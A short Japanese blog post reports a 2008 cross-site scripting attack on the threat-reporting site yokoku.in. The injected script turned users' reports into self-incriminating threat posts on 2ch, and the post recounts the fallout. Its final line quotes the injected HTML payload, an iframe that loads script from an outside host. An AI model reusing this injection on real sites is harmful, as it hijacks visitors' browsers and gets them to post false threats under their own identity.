あぷ速 予告.inがクロスサイトスクリプティング攻撃を受けたっぽい(情報元のブックマーク数)
(a threadless kite - 糸の切れた凧(2008-08-03)経由)
予告inにクロスサイトスクリプティングでスクリプトがうめこまれたそうです。
3日午前3時頃、予告inに通報(予告inでのスレ立て)しようとすると、
あぷ速 予告.inがクロスサイトスクリプティング攻撃を受けたっぽい
VIP板にフシアナで「警視庁※※する」というスレを立ててしまうスクリプトが埋め込まれる。
↓
通報した本人が犯行予告して通報されるという永久機関が完成。VIP荒れる
↓
便乗して本当に犯行予告するアホが現われる
↓
他サイトでも、今回の脆弱性を利用したスクリプトが発見される
↓
矢野涙目でスクリプト修正中?←今ここ
+
「今回の犯行予告はスルーなの?通報しろ」「スクリプトだウイルスだ言えばセーフ?」
「矢野の責任追求しろ」、「また矢野は都合の悪い事はスルーか」等々
こんなスクリプトがうめこまれたそうです。
<a href=/detail?num=3882>■</a>test <a href=http://a.a/><iframe/src=' //a.zz.tc/8/'><font size=1 color=#777777></a></font></a></div>